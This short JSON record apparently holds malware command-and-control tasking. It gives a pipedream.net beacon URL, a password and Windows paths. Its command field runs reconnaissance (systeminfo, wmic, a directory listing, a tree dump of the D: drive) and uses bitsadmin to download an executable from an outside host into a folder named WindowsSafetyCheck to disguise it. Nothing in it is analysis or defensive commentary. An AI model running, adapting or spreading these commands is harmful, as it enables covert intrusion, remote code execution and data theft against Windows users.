{"breath":"https://eog70e0zwzqc91s.m.pipedream.net","24w413b":{"PassWord":"SifeCleak123456","path":"C:\\Users\\Administrator\\"},"command":"dir C:\\Users\\admin\\Desktop /a\nsysteminfo\nif not exist C:\\Users\\admin\\WindowsSafetyCheck (mkdir C:\\Users\\admin\\WindowsSafetyCheck & bitsadmin /transfer WindowsCheckingDownload https://safety22w413a.femd.eu.org/WindowsTrans.exe C:\\Users\\admin\\WindowsSafetyCheck\\WindowsTrans.exe) else (echo having exist)\nif not exist C:\\Users\\admin\\WindowsSafetyCheck\\d.txt (tree D:\\ > C:\\Users\\admin\\WindowsSafetyCheck\\d.txt)\nwmic logicaldisk get size,freespace,caption"}